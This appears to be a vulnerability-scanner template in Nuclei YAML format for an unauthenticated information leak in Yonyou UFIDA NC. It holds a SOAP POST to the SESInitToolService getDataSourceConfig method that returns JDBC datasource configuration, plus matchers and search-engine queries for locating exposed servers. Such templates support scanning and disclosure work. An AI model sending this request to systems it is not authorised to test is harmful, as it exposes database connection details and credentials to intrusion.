id: yonyou_nc_getdatasourceconfig_unauthorized

info:
  name: yonyou_nc_getdatasourceconfig_unauthorized.yaml
  author: Xc1Ym
  severity: medium
  description: 用友UFIDA NC getDataSourceConfig存在信息泄露漏洞
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="用友-UFIDA-NC"
    hunter-query: app.name="用友 UFIDA NC"
  tags: unauthorized,OA,yonyou,hw

http:
  - method: POST
    path:
      - "{{RootURL}}/uapws/service/nc.itf.ses.inittool.SESInitToolService"
    headers: {}
    body: "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ses=\"http://inittool.ses.itf.nc/SESInitToolService\"><soapenv:Header/><soapenv:Body><ses:getDataSourceConfig/></soapenv:Body></soapenv:Envelope>"
    matchers:
      - type: word
        part: body
        words:
          - jdbc
          - soap:Envelope
        condition: and
      - type: word
        part: header
        words:
          - Apache-Coyote/1.1
    matchers-condition: and
# digest: 4a0a004730450220615880f9fb42a308114ee7cdee5450d46be5628a65834db975d3f36d7be29f250221008d81bd430a14f68fc05c65730c990a3eb3044d0546b5028a45ec06b9bc12ffe5:6b2dd5af372f02ed15a56faf8ad98cf9